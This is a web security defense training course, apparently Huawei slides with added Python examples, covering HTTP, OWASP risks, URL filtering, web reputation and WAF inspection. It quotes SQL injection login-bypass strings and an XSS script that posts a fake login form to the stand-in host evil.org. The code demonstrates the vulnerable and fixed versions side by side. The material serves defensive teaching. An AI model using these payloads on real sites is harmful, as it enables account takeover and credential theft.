
Web Security Defense

Copyright © 2017 Huawei Technologies Co., Ltd. All rights reserved.


Foreword

Traditional network attack and defense methods have matured. With the explosive development of the application market, web-based applications are emerging everywhere, and against this background web applications frequently fall victim to hacking. This chapter describes common attack methods against web applications and the corresponding defense methods.
Objectives

On completion of this course, you will be able to understand:

- Basic structure of web applications, web working principles, HTTP working process, and HTTP packet structure
- Principles and configurations of URL filtering
- Common technical methods for web security defense
- Common web attacks such as SQL injection and cross-site scripting (XSS)
- Defense principles of the WAF
Contents

01 Web Security Defense Overview

02 Basic Web Principles

03 Web Attack Analysis

04 URL Filtering Technology

05 Malicious Web Page Detection Technology

06 Web Application System Protection Technology


Status Quo of Web Applications

Figure: bar chart of the number of websites implanted with backdoors on the territory of China in 2016, by month (January to December); vertical axis from 0 to 35,000, unit: number.
Web Attack Sources

- Based on the implementation mechanism of web applications, web attack sources can be discussed from the following aspects:

  Client                    Server                                      Communication channel
  - Website Trojan horses   - Vulnerability of the web server           - DoS and CC attacks
  - Phishing spoofing       - Authorization and authentication attacks  - Eavesdropping
  - Active attacks          - XSS attacks                               - SSL redirection
                            - SQL injection

Basic Components of Web Applications

- The web is implemented based on the client/server architecture and consists of the following parts:
  - Use Hypertext Markup Language (HTML) to describe a file.
  - Use a Uniform Resource Locator (URL) to specify the file location.
  - Use Hypertext Transfer Protocol (HTTP) to communicate with the server.

Figure: the client accesses the URL www.Huawei.com over HTTP/HTTPS; the URL specifies the HTML file on the server, and the returned HTML file is displayed on the client.
HTML Example

Figure: an HTML page with callouts marking the elements that define the title of a web page, define a web page image, and define a web page button or link.
URL Working Process

Figure: the server document root (docroot) contains Index.html and the directories enterprise (index.html, service.html) and images (device.jpg, icon.jpg). The URL http://support.huawei.com/enterprise/zh/index.html, requested over HTTP/HTTPS, maps to a file under this tree.
- HTTP is a stateless protocol based on requests/responses.

Figure: a request/response exchange shown as a dialogue between client and server:
  1. Client: "Dear Sir/Madam,"
  2. Server: "What can I do for you?"
  3. Client: "I need the XXX file."
  4. GET /http://class/xxxx HTTP/1.1
  5. Server: "Do you have a key?"
  6. Client: "Yes, it's &……%@(#."
  Server: "OK. This is the file you want." (HTTP/1.1 200 OK)

- HTTP has two types of packets:
  - Request packet: sent from the client to the server.
  - Response packet: returned from the server to the client.
HTTP Request Packets

- An HTTP request packet is formed by the following four parts: request line, request header, blank line, and request data.

  Request line:    Request method <space> URL <space> Protocol version <carriage return><newline>
  Request header:  Header field name ":" Value <carriage return><newline>
                   ... (one such line per header field)
  Blank line:      <carriage return><newline>
  Request data

Among the request methods, POST is regarded as more secure than GET; some security risks arise from the data carried in a GET request.

HTTP Response Packet

- An HTTP response also consists of three parts: status line, response header, and response data.

  Status line:      Version <space> Status code <space> Phrase <carriage return><newline>
  Header lines      Header field name ":" Value <carriage return><newline>
  (response header) ... (one such line per header field)
  Blank line:       <carriage return><newline>
  Response data
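A minimal parser for the request and response packet layouts just described (start line, header lines, blank line, data), as an added example that is not part of the original slides. The sample packets, the host name and the session cookie value are constructed for this example.

```python
from dataclasses import dataclass, field
from typing import Dict, Tuple

CRLF = "\r\n"


@dataclass
class HttpMessage:
    # request: (method, URL, version); response: (version, status code, phrase)
    start_line: Tuple[str, str, str]
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def _split_message(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a packet at the blank line into start line, headers and data."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("packet has no blank line separating headers from data")
    lines = head.split(CRLF)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        # Each header line is "<field name>: <value>" terminated by CR LF.
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_request(raw: str) -> HttpMessage:
    """Request line: Method SP URL SP Version CRLF, then headers and request data."""
    start, headers, body = _split_message(raw)
    parts = start.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"malformed request line: {start!r}")
    return HttpMessage((parts[0], parts[1], parts[2]), headers, body)


def parse_response(raw: str) -> HttpMessage:
    """Status line: Version SP Status-code SP Phrase CRLF, then headers and data."""
    start, headers, body = _split_message(raw)
    parts = start.split(" ", 2)            # the reason phrase may contain spaces
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError(f"malformed status line: {start!r}")
    phrase = parts[2] if len(parts) == 3 else ""
    return HttpMessage((parts[0], parts[1], phrase), headers, body)


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Turn 'lang=en; sessionid=abc123' into a dict so the session ID can be read."""
    cookies: Dict[str, str] = {}
    for item in value.split(";"):
        name, _, val = item.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


# Constructed sample packets for this example (not captured traffic).
SAMPLE_REQUEST = (
    "POST /login.jsp HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Cookie: lang=en; sessionid=abc123\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=alice&password=secret"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sessionid=abc123; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>Welcome</body></html>"
)

if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    print(req.start_line, req.headers, req.body)
    print(parse_cookie_header(req.headers["cookie"]))
    print(parse_response(SAMPLE_RESPONSE).start_line)
```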
Cookie Overview

- The cookie is a technology that maintains HTTP status information on a client. The web server sends the response packet carrying cookies to a client browser.
Session Overview

- A session is a storage space on a server maintained by an application server. When a user connects to a server, the server generates a unique session ID. This session ID is used to identify the session storage space on the server.
- Sessions are stored on the server.
Relationships Between Cookies and Sessions

- When a user requests the session page, the web server generates a session and a session ID and returns a temporary cookie (key=sessionid). When the user requests the session page a second time, the cookie information is carried in the request. The web server receives the request, reads the session through the session ID, and returns the information to the user. Session IDs are saved on the client using cookies. When a user accesses a page, the session ID is submitted to the server, which uses it to store session data. This process does not require intervention by R&D personnel. Once the cookie is disabled on the client, the session becomes invalid.

Figure: browser and web server exchange:
  (1) Request for the session page
  (2) The server creates the session: sessionid (data) -> (key, values)
  (3) Return a temporary cookie (key=sessionid)
  (4) Request the session page, carrying the cookie information
  (5) Read the session through the session ID in the cookie
  (6) Return the information to the user

OWASP TOP 10

OWASP Top 10 Application Security Risks – 2017:
  A1: Injection
  A2: Invalid identity authentication and session management
  A3: XSS
  A4: Invalid access control
  A5: Incorrect security configuration
  A6: Sensitive information leak
  A7: Insufficient attack detection and protection
  A8: Cross-site request forgery (CSRF)
  A9: Using components with known vulnerabilities
  A10: APIs that are not effectively protected

- Most of the risks listed in the table are caused by insufficient encryption, defense, and access control.
- Injection, XSS, and CSRF are common web attacks and key points in this chapter.
Injection Vulnerabilities

- An injection vulnerability occurs when the application program sends untrusted data to an interpreter. The essence of an injection vulnerability is that data and code are confused, so that the input data becomes executable.
- SQL injection is the most common and most severe injection attack.
- Injection can cause data loss, data damage, lack of auditability, or denial of service (DoS). Injection vulnerabilities can sometimes lead to full host takeover.
SQL Injection

Results unexpected by the programmer:
  Username: admin' OR 1=1 --
  Password: 1
  Resulting statement:
    SELECT COUNT(*) FROM Users WHERE username='admin' OR 1=1 -- ' and password='1'
  The -- is the comment character of MS SQL. The ' is the delimiter.
  Result: login succeeded (attacker -> /login.jsp).

Key points for attacks:
  - Inject the attacker's intent into the SQL statement through the delimiter of the SQL character string variable.
  - Ensure that the SQL statement is correct using comments.

ORACLE: in the user name field, enter ' or '1'='1' or '1'='1. Or enter 1' or '1'='1 in the password field.
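The login query from the slide built by string concatenation, placed beside a parameterised version, as an added example that is not part of the original slides. It uses an in-memory SQLite database with a constructed Users table; SQLite accepts the same -- line comment as MS SQL, so the slide's username produces the same effect.

```python
import sqlite3

# The username and password from the slide.
PAYLOAD_USER = "admin' OR 1=1 -- "
PAYLOAD_PASS = "1"


def make_db() -> sqlite3.Connection:
    """Constructed Users table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "s3cret-admin"), ("bob", "hunter2")])
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Concatenates user input into the SQL text: the delimiter (') closes the
    string variable and the comment (--) removes the password check, so the
    input changes the structure of the statement."""
    return ("SELECT COUNT(*) FROM Users WHERE username='" + username +
            "' and password='" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    count = conn.execute(build_vulnerable_query(username, password)).fetchone()[0]
    return count > 0


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders keep the input as data: the quote and -- never reach the SQL
    parser as syntax, so the statement's structure cannot be changed."""
    row = conn.execute(
        "SELECT COUNT(*) FROM Users WHERE username=? and password=?",
        (username, password)).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD_USER, PAYLOAD_PASS))
    print("vulnerable login:", login_vulnerable(db, PAYLOAD_USER, PAYLOAD_PASS))        # True
    print("parameterised login:", login_parameterised(db, PAYLOAD_USER, PAYLOAD_PASS))  # False
```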
Basic Procedure for SQL Injection

Figure: the stages of an injection, with the probe strings shown beside each:
  - Check whether an injection vulnerability exists: a single quotation mark ('), "and 1=1", "or '1' = '1'"
  - Determine the database type: one semicolon followed by two straight lines (;--)
  - Obtain the database data or dump the entire database
  - Escalate privileges: "and exists (select count(*) from" (the string is cut off on the slide)
XSS

- XSS has been one of the most common network attack methods in recent years and accounts for a large proportion of network attacks. Many websites, such as Facebook, have encountered such attacks. The network viruses that attacked Sina Weibo, a well-known company in China, were also caused by XSS vulnerabilities.
- In essence, XSS is a malicious code execution method. XSS occurs because the website does not strictly filter the data submitted by users.
- Basic cross-site types:
  - Reflected XSS
  - Stored XSS
Implementation Procedure for Reflected XSS Attacks

Figure: attacker, user, and web server or application. Recoverable steps: 2. The attacker submits the prepared URL to the user. 5. The attacker's JavaScript is executed in the user's browser. 6. The user's browser sends session tokens to the attacker.

Implementation Procedure for Stored XSS Attacks

Figure: attacker, user, and web server or application. Recoverable steps: 5. The attacker's JavaScript is executed in the user's browser. 6. The user's browser sends session tokens to the attacker.
Example of the Reflected XSS Attacks

Figure: a hacker, a blog website, and user A.
  1. Hacker: "I am going to publish a post and put a malicious script in it." The hacker enters the following code in a normal web page:
       I bet you haven't seen something like this.
       <script>
       document.body.innerHTML="<h1>Please Login</h1><form action=http://evil.org/grabpassword.jsp method=post><br>User name:<input type=text name=user><br>Password:<input type=text name=password></p><input type=submit name=login></form>"
       </script>
  2. A user clicks the post on the website. User A: "Wow, this post looks interesting. I cannot wait to read it."
  3. The page contains the code, and a dialog box is displayed. User A: "Should I log in again?"
  4. The user enters the user name and password, and the submitted information is obtained by the hacker.
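The blog post from the figure rendered by a template that inserts user content verbatim, beside a version that HTML-escapes it, as an added example that is not part of the original slides. The post text is constructed from the slide's script; the page template and the detection helper are assumptions of this example.

```python
import html
import re

# Constructed from the slide's script (the post the hacker submits).
POST_FROM_SLIDE = (
    "I bet you haven't seen something like this.\n"
    "<script>document.body.innerHTML=\"<h1>Please Login</h1>"
    "<form action=http://evil.org/grabpassword.jsp method=post>"
    "<br>User name:<input type=text name=user>"
    "<br>Password:<input type=text name=password></p>"
    "<input type=submit name=login></form>\"</script>"
)
# Assumed page template of the blog site.
PAGE = '<html><body><h2>Latest post</h2><div class="post">{}</div></body></html>'


def render_vulnerable(post: str) -> str:
    """Inserts the submitted text unchanged, so the browser parses the <script>."""
    return PAGE.format(post)


def render_escaped(post: str) -> str:
    """html.escape turns < > & " ' into entities: the text is shown, not executed."""
    return PAGE.format(html.escape(post, quote=True))


SCRIPT_START = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_element(page: str) -> bool:
    """Detection helper: True if a real <script> start tag survives in the output."""
    return SCRIPT_START.search(page) is not None


if __name__ == "__main__":
    print(contains_script_element(render_vulnerable(POST_FROM_SLIDE)))   # True
    print(contains_script_element(render_escaped(POST_FROM_SLIDE)))      # False
```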
CSRF

- CSRF (or XSRF) is also called a one-click attack or session riding. It is a malicious exploitation of a website. CSRF differs from XSS, especially in attack mode: XSS attacks make use of the trusted users of a site, while CSRF attacks forge requests from trusted users to exploit trusted websites.
Principle of CSRF Attacks

- A CSRF attack can be completed only when the victim performs the following two steps in sequence:
  - Log in to the trusted website A. Cookies are generated locally.
  - Access the malicious website B without logging out of website A.

Figure: website with CSRF vulnerabilities: website A (trusted); attacker: website B (hacked); victim: user C.
  1. User C views and logs in to the trusted website A.
  2. The verification is passed, and the cookies of website A are generated for user C.
  3. The user accesses the risky website B without logging out of website A.
  4. Website B requests to access the third-party website A and sends a request.
  5. The browser uses the preceding cookies to access website A based on the request of website B.
  6. Website A cannot distinguish whether the request is sent by user C or website B. As the browser automatically carries the cookies of user C, website A processes the request according to the user permissions. In this way, website B achieves the purpose of simulating user operations.
Web Security Defense Methods

Code of conduct:
- Using URL filtering to regulate online behavior
- Using the web credit system to defend against malicious websites

Web application system defense/intrusion detection:
- Defending against server vulnerabilities and database vulnerabilities
- Defending against XSS attacks

Anti-DDoS:
- Defending against HTTP flood attacks

Necessity of URL Filtering

- The security risks brought by social engineering occupy a large proportion. URLs, as manual operations performed on clients, open the first door for web attacks.
- If employees of an organization access websites without restriction, it may:
  - Greatly reduce the work efficiency of employees.
  - Waste enterprise network bandwidth resources.
  - Introduce viruses and Trojan horses to the intranet from malicious sites.
  - Expose people to a large amount of pornographic and violent information, which affects their health mentally and physically.

Figure: employees behind the FW accessing a news website, shopping website, video website, service website, porn website, violent website, and others.
URL Address Structure

- Each web page on the Internet has a unique identifier, that is, the URL.

  http://www.abcd.com:8080/news/education.aspx?name=tom&age=20

  hostname: www.abcd.com; [:port]: 8080; path: /news/education.aspx; query: name=tom&age=20
URL Filtering Principles

Figure: intranet employees A, B, and C behind the FW accessing www.game.com and www.tech.net.
  1. A user accesses the website www.game.com.
  2. A connection is established through the TCP three-way handshake.
  3. The browser sends an HTTP GET request.
  4. The device intercepts the HTTP GET request and checks whether the request is valid.
  5. If the request is valid, the request is permitted and the user can access the corresponding website.
  6. If the request is invalid, the device can directly close the TCP connection.
  7. If the request is invalid, the device can also push an alarm page and then disconnect the TCP connection.
URL Classification and Filtering Technology

- Multiple URL profiles can be created based on user-defined categories or predefined categories.
- Each URL profile defines the action taken for each URL category.

  URL profile                          Description
  URL profile of the sales department  ...
  URL profile of the R&D department    ...

  URL profile of the R&D department    URL profile of the sales department
  Category     Action                  Category     Action
  Sports       Block                   News         Block
  Competitor   Allow                   Politics     Allow
  Search       Allow                   Porn         Block
  Gaming       Block                   Violence     Block
  ...          ...                     ...          ...
URL Matching Mode

- URL matching modes include prefix matching, suffix matching, keyword matching, and exact matching.

  Prefix matching
    Function: matches URLs that start with a specified character string.
    Character string example: www.example*
    Result: all URLs that start with www.example are matched, including www.example.com and www.example.com/solutions.do.

  Suffix matching
    Function: matches all URLs that end with a specified character string.
    Character string example: *aspx
    Result: all URLs that end with aspx are matched, including www.example.com/news/solutions.aspx, www.example.com/it/price.aspx, and 10.1.1.1/sports/abc.aspx.

  Keyword matching
    Function: matches all URLs that contain a specified character string.
    Character string example: *sport*
    Result: all URLs that contain sport are matched, including sports.example.com/news/solutions.aspx and 10.1.1.1/sports/.

  Exact matching
    Function: first compares the URL against the specified character string. If the URL does not match the string, the last directory in the URL is removed and the remaining part is compared against the string. If the URL still does not match, the second-last directory is deleted and the check is repeated. This continues until the domain name has been compared against the string.
    Character string example: www.example.com
    Result: based on the matching rules, the following URLs match www.example.com: www.example.com, www.example.com/news, and www.example.com/news/en/. The following URL does not match www.example.com: www.example.com.cn/news.
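The four matching modes of the table implemented in Python, with the table's own strings as inputs, as an added example that is not part of the original slides or of any vendor implementation. It assumes URLs are compared without a scheme, as the table shows them (www.example.com/news, 10.1.1.1/sports/).

```python
from typing import Callable, Dict


def _strip_scheme(url: str) -> str:
    """Compare without the scheme, as the table's examples are written."""
    for scheme in ("https://", "http://"):
        if url.lower().startswith(scheme):
            return url[len(scheme):]
    return url


def prefix_match(pattern: str, url: str) -> bool:
    """'www.example*' matches URLs that start with www.example."""
    return _strip_scheme(url).startswith(pattern.rstrip("*"))


def suffix_match(pattern: str, url: str) -> bool:
    """'*aspx' matches URLs that end with aspx."""
    return _strip_scheme(url).endswith(pattern.lstrip("*"))


def keyword_match(pattern: str, url: str) -> bool:
    """'*sport*' matches URLs that contain sport anywhere."""
    return pattern.strip("*") in _strip_scheme(url)


def exact_match(pattern: str, url: str) -> bool:
    """Compare the URL with the string; on a mismatch drop the last directory
    and compare again, repeating until only the domain name is left."""
    candidate = _strip_scheme(url).rstrip("/")
    while True:
        if candidate == pattern:
            return True
        if "/" not in candidate:          # down to the domain name: no match
            return False
        candidate = candidate.rsplit("/", 1)[0]


MODES: Dict[str, Callable[[str, str], bool]] = {
    "prefix": prefix_match, "suffix": suffix_match,
    "keyword": keyword_match, "exact": exact_match,
}


def match(mode: str, pattern: str, url: str) -> bool:
    return MODES[mode](pattern, url)


if __name__ == "__main__":
    for url in ("www.example.com/news/en/", "www.example.com.cn/news"):
        print(url, match("exact", "www.example.com", url))
```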
URL Filtering Process

Figure: processing pipeline.
  Traffic reassembly -> Application recognition -> Protocol decoding -> Mode matching -> Mode matching result obtaining -> URL filtering -> Response
  URL filtering consists of, in order:
    1. Blacklist and whitelist filtering
    2. User-defined category filtering
    3. Malicious URL filtering or low-reputation URL matching
    4. User-defined local cache query
    5. Predefined remote search
Overall Process of URL Filtering

Figure: a user in the Trust zone sends an HTTP access request through the USG to a web server in the Untrust zone; the USG also reaches a URL category server. The request is processed in the following order, and each step can end with the result shown:
  1. Anti-evasion processing
  2. URL whitelist (match: Allow)
  3. URL blacklist (match: Block)
  4. Local user-defined URL categories (Block)
  5. Malicious URL search or low-reputation URL matching (Block)
  6. Predefined cache query (Block or Allow)
  7. Remote category query to the URL category server (category query, category return; Block or Allow)
  If no policy is matched, the configured default action (Block or Allow) applies.
Key Configurations for URL Filtering - URL Categories

Figure: configuration screen with callouts for user-defined URL categories and predefined URL categories.

Key Configurations for URL Filtering - URL Filtering Policies (1/2)

Figure: configuration screen with callouts:
- If a URL belongs to multiple categories, the FW takes an action based on the action pattern. The action pattern is either Strict or Loose.
- If the URL does not match any blacklist, whitelist, or URL category in the local cache and the remote query function for predefined categories is unavailable, the FW takes the default action.
- Configure the URL blacklist and whitelist.
- Configure this parameter based on the predefined URL category. For details, see the next slide.

Key Configurations for URL Filtering - URL Filtering Policies (2/2)

Figure: configuration screen with callouts:
- The URL filtering level takes effect only on predefined categories. The actions for user-defined categories must be manually configured by the administrator. The default action is Allow.
- Select an action based on URL categories.
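The decision order of the "Overall Process of URL Filtering" figure together with the action-pattern and default-action rules of the configuration slides, written as one function, as an added example that is not part of the original slides or of the USG software. Assumptions, also noted in the code: the anti-evasion step is reduced to host normalisation; the remote query is a callable that returns None when unavailable; Strict blocks a URL if any of its categories blocks it and Loose allows it if any allows it (the slides name the patterns but do not define them); all host names are constructed.

```python
from typing import Callable, Dict, List, Optional, Set

BLOCK, ALLOW = "block", "allow"


def normalise_host(url: str) -> str:
    """Step 1, anti-evasion, in an assumed minimal form: strip scheme, path,
    port, trailing dot and case so that variants of one host compare equal."""
    host = url.split("://", 1)[-1].split("/", 1)[0]
    return host.split(":", 1)[0].rstrip(".").lower()


class UrlFilterProfile:
    def __init__(self, whitelist: Set[str], blacklist: Set[str],
                 user_categories: Dict[str, List[str]], malicious: Set[str],
                 predefined_cache: Dict[str, List[str]],
                 remote_query: Callable[[str], Optional[List[str]]],
                 category_actions: Dict[str, str],
                 action_pattern: str = "strict", default_action: str = ALLOW):
        self.whitelist, self.blacklist = whitelist, blacklist
        self.user_categories = user_categories      # host -> user-defined categories
        self.malicious = malicious                  # malicious / low-reputation hosts
        self.predefined_cache = predefined_cache    # host -> predefined categories
        self.remote_query = remote_query            # returns None when unavailable
        self.category_actions = category_actions    # category -> BLOCK or ALLOW
        self.action_pattern = action_pattern        # "strict" or "loose"
        self.default_action = default_action

    def _decide(self, categories: List[str]) -> str:
        """A URL in several categories: Strict blocks if any category blocks,
        Loose allows if any category allows (assumed reading of the patterns).
        A category without a configured action defaults to Allow, as the slide states."""
        actions = [self.category_actions.get(c, ALLOW) for c in categories]
        if self.action_pattern == "strict":
            return BLOCK if BLOCK in actions else ALLOW
        return ALLOW if ALLOW in actions else BLOCK

    def check(self, url: str) -> str:
        host = normalise_host(url)                           # 1. anti-evasion
        if host in self.whitelist:                           # 2. whitelist: Allow
            return ALLOW
        if host in self.blacklist:                           # 3. blacklist: Block
            return BLOCK
        if host in self.user_categories:                     # 4. user-defined categories
            if self._decide(self.user_categories[host]) == BLOCK:
                return BLOCK                                 #    (only a Block exit in the figure)
        if host in self.malicious:                           # 5. malicious / low reputation
            return BLOCK
        if host in self.predefined_cache:                    # 6. predefined cache
            return self._decide(self.predefined_cache[host])
        remote = self.remote_query(host)                     # 7. remote category query
        if remote is not None:
            return self._decide(remote)
        return self.default_action                           # no policy matched


if __name__ == "__main__":
    # Constructed sample configuration.
    actions = {"gaming": BLOCK, "news": ALLOW, "porn": BLOCK, "search": ALLOW}
    profile = UrlFilterProfile(
        whitelist={"www.example.com"}, blacklist={"bad.example.net"},
        user_categories={"www.game.com": ["gaming"]}, malicious={"evil.example.org"},
        predefined_cache={"sports.example.com": ["sports"]},
        remote_query=lambda h: {"www.tech.net": ["news", "search"]}.get(h),
        category_actions=actions, action_pattern="strict", default_action=BLOCK)
    for u in ("http://www.game.com/play", "http://www.tech.net/", "http://unknown.example/"):
        print(u, profile.check(u))
```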

Malicious URL Detection

- Malicious URL sources:
  - Sandbox interworking
  - Antivirus detection
  - Low-reputation websites
- Malicious URL detection control: when the malicious URL detection function is enabled in the URL profile, the preceding malicious URLs are detected in sequence.
Application Scenarios of the Web Reputation System

- Web reputation indicates the credibility of a website. Files on websites with high reputation are more secure. Based on the reputation of a website, the FW determines whether to extract files from the network traffic for threat detection.
- URL reputation reflects the reliability of the URL that a user accesses.
- The FW uses the remote query service to obtain the URL reputation and blocks the low-reputation URLs.

Figure: the FW obtains URL reputation from a remote server.

Web Reputation System Processing Flow

Figure: traffic of website A and website B flows from the Internet through the FW to the enterprise intranet. Files extracted by the FW are passed to a cluster manager, which distributes them to detection nodes 1, 2, and 3.
Website Category Divided by Web Reputation

- The Web reputation function categorizes websites into the following four categories based on their reputation:
  - Predefined credible website
  - Predefined suspicious website
  - User-defined credible website
  - Unknown website

Web Reputation System Processing Flow

Figure: flowchart.
  Start -> Extract host information
  -> Match the user-defined suspicious websites? Yes: restore the file. No:
  -> Match the user-defined credible websites? Yes: do not restore the file. No:
  -> Match the user-defined credible websites? Yes: do not restore the file. No:
  -> Unknown website: restore the file
  -> End
Web Reputation Matching Mode

- The web reputation function extracts the host field information from the URL of an accessed website and matches the string with the web reputation website categories. The host field can be a domain name or an IP address.

  host field    Level-1 domain name format        Example                                      Matching mode
  IP address    N/A                               192.168.10.10 or 192.168.10.10:8080          The system directly matches the string without any processing.
  Domain name   Does not contain dots (.)         example, example-abc, or example123          The system directly matches the string without any processing.
  Domain name   Contains one or two dots (.)      example.com or example.com.cn                The system performs character string matching for example only.
  Domain name   Contains more than two dots (.)   www.abc.example.com or abcd.example.com.cn   The system performs character string matching for example only.
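Extracting the host field from a URL, reducing it to the level-1 name as the table describes, and matching it against the categories in the order of the flowchart above, as an added example that is not part of the original slides or of the FW software. Assumption, also noted in the code: the slides do not say how the level-1 label is found, so a short public-suffix label list is used here; a real device would use a complete list.

```python
from ipaddress import ip_address
from typing import Set, Tuple
from urllib.parse import urlsplit

# Assumed: labels that are never the level-1 name ("com" in example.com,
# "com" and "cn" in abcd.example.com.cn). A real implementation needs a full list.
PUBLIC_SUFFIX_LABELS = {"com", "net", "org", "cn", "gov", "edu"}


def host_field(url: str) -> str:
    """The host field of the URL, including any :port, in lower case."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url).netloc.lower()


def _is_ip(host: str) -> bool:
    try:
        ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def level1_name(host: str) -> str:
    """An IP address (with or without port) and a name without dots are matched
    as-is; any other domain name is reduced to its level-1 label ("example")."""
    if _is_ip(host):
        return host
    host = host.split(":", 1)[0]
    labels = host.split(".")
    if len(labels) == 1:
        return host
    while len(labels) > 1 and labels[-1] in PUBLIC_SUFFIX_LABELS:
        labels.pop()
    return labels[-1]


def reputation_category(url: str, user_suspicious: Set[str],
                        user_credible: Set[str],
                        predefined_credible: Set[str]) -> Tuple[str, bool]:
    """Match in the order of the flowchart, which is the matching priority when
    a name falls into several categories. Returns the category and whether the
    file is restored (extracted) for detection."""
    key = level1_name(host_field(url))
    if key in user_suspicious:
        return "user-defined suspicious", True
    if key in user_credible:
        return "user-defined credible", False
    if key in predefined_credible:
        return "predefined credible", False
    return "unknown", True


if __name__ == "__main__":
    for h in ("192.168.10.10:8080", "example-abc", "example.com.cn", "www.abc.example.com"):
        print(h, "->", level1_name(h))
```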
Key Configurations of the Web Reputation Function

Figure: configuration screen with callouts:
- Enable the Web reputation function.
- Add credible websites.
- Enter suspicious websites. When users access suspicious websites, sandbox detection is performed first.
- Top N: indicates the top N domain names that have the largest number of visits. You can view the ranking of websites in the ranking statistics.

Comprehensive Query of Reputation Websites

Figure: query screen. Enter the domain name of the website to be queried and click Search. The Web reputation category of the website is displayed.
- The matching result is determined by the matching priority, because a domain name can be categorized into different categories. The displayed Web reputation category is the final matching result.

Security Defects of the Web Application System

Security risks of program design:
- Insecure user access processing mechanism
- Insecure data verification mechanism
- Insecure system resource control mechanism
- Insecure system border protection mechanism
- Security defects in programming

Security risks of configuration management:
- Security defects in server configuration management
- Security defects in database configuration management
- Security defects in the configuration management of the release platform
- Security defects in application configuration management

Security vulnerabilities of the running platform:
- Security vulnerabilities of the application server
- Security vulnerabilities of the database management system
- Security vulnerabilities of the release platform
Introduction to WAF

- The WAF runs a series of security policies on HTTP/HTTPS traffic to protect web applications.
- Specifically, the WAF filters each field in an HTTP packet based on rules.
WAF Workflow

- The WAF consists of the execution front end, the back-end center system, and the database.

Figure: HTTP packets enter the WAF engine in the execution front end, which exports the detection result. The back-end center system holds the web configuration, WAF configurations, rule configurations, and blacklist, generates the rule and query logic used for detection, and exchanges data requests with the database.
WAF Processing Architecture

Figure: incoming traffic (SQL injection/CC attacks, server vulnerability attacks, sensitive information submission, and normal access) passes in turn through the network security check, security whitelist check, web service security check, content security check, and web application security check. Each kind of attack is stopped at the corresponding check, and only normal access reaches the web application. The WAF dynamically generates security rules to block IP addresses that frequently attack websites.
WAF Functions

- In-depth security defense
- Anti-DDoS/CC attack defense
- Self-learning modeling and whitelist defense
- High-performance detection
- Anti-tampering
- Automatic detection application
- High-speed cache
In-depth Security Defense

- In-depth security defense consists of two parts:
  - Blacklist signature-based detection
  - Protocol reassembly detection
- The process is as follows:

  Step 1: Check the HTTP request header
    - Check whether the header field complies with the protocol
    - Check the value of the Method field
    - Check the value of the URL field
    - Check the value of the Version field
    - Check the value of the User-Agent field
    - Check the value of the Cookie field
    - Check the value of the Referer field
  Step 2: Check the HTTP request packet content
    - Check the security of the submitted content (when the request method is POST)
  Step 3: Check the HTTP response packet header
    - Check whether the header field complies with the protocol
    - Check the value of the Response_code field
    - Check the value of the server field
  Step 4: Check the HTTP response packet content
    - Check whether server information disclosure occurs on the HTTP return page
    - Enable the content detection of the response packet
In-depth Security Protection - Blacklist Signature-based Detection

Figure: the WAF sits between web users and hackers and the web applications.
  Input detection (requests): XSS attacks, SQL injection, command injection, Cookie/Session hijacking, parameter or list tampering, buffer overflow attacks, directory traversal, CSRF attacks, link theft.
  Output detection (responses): directory traversal, error message, information disclosure.
In-depth Security Protection - Protocol Reassembly Detection

Figure: the WAF between web users and hackers and the web applications caches and reassembles packets, so that the content is inspected as a whole after reassembly, for example:
  Get /index.asp?id=1 and 1=1

DDoS/CC Attack Defense

Figure: the CC attack defense module of the WAF watches a burst of requests on the time axis between 00:00:00 and 00:01:00:
  Get /show.asp?id=1
  Get /show.asp?id=2
  Get /show.asp?id=3
  Get /show.asp?id=4
  Get /show.asp?id=…
Self-Learning Modeling and Whitelist Defense

Figure: the WAF between web users and hackers and the web applications, with output detection.
  Valid input:
    Submission mode: POST
    ID card number: a combination of 18 digits and letters
    Password: a combination of 6 digits
  Invalid input:
    Submission mode: POST
    ID card number: ' or '1' = '1
    Password: 1=1
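The four inspection steps of the in-depth security defense process and the whitelist model of the self-learning slide, as one request/response inspector, as an added example that is not part of the original slides or of the WAF product. The allowed methods and versions, the header-name token rule (RFC 7230), the version-disclosure and error-page patterns, and the /login.jsp field model are assumptions of this example; the sample messages are constructed.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Assumed protocol-compliance rules for step 1 and step 3.
ALLOWED_METHODS = {"GET", "POST", "HEAD"}
ALLOWED_VERSIONS = {"HTTP/1.0", "HTTP/1.1"}
HEADER_NAME = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")   # RFC 7230 token
COOKIE_PAIR = re.compile(r"^[^=;\s]+=[^;]*$")                 # name=value
VERSION_LEAK = re.compile(r"/\d")                            # e.g. "Apache/2.4.6"
ERROR_PAGE = re.compile(r"(stack trace|exception|syntax error|warning:)", re.I)

# Whitelist model learned from the valid submissions on the slide (assumed path).
FIELD_MODEL = {
    "/login.jsp": {
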